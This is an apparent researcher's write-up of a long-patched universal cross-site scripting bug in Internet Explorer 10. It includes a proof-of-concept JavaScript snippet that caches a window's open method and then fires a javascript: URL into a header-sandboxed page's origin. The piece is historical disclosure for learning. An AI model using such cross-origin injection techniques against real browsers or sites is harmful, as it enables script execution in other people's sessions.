I called this the “SandboxHeadersParadox” because the UXSS actually required the target URL to be sandboxed via X-Content-Security-Policy headers, meaning the very security headers intended to protect a page made it exploitable via this technique. The trick relied on caching a reference to the opened window's open method before the target page loaded, then calling that cached reference after the navigation.

var win, win_open;

function main() {
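    win = window.open("index.html"); // Open any same-domain URL.
    win_open = win.open; // Save a reference to the new window's open method.

    // After 1 second, navigate the window to the header-sandboxed target page.
    setTimeout('win.location = "sandboxed-via-headers.aspx";', 1000);
    // After 2 seconds, call the cached reference with a javascript: URL aimed at the same window.
    setTimeout('win_open("javascript:alert(document.URL)","_self")', 2000);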
}

The page is running in IE8 emulation mode (via X-UA-Compatible) in order to preserve the cached window.open reference across navigation, a behavior that was tightened in later document modes. Once the window navigates to the CSP-sandboxed page, calling the cached win_open with a javascript: URL executes in the sandboxed page’s origin. Tested on fully patched IE10 Desktop on Windows 8.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.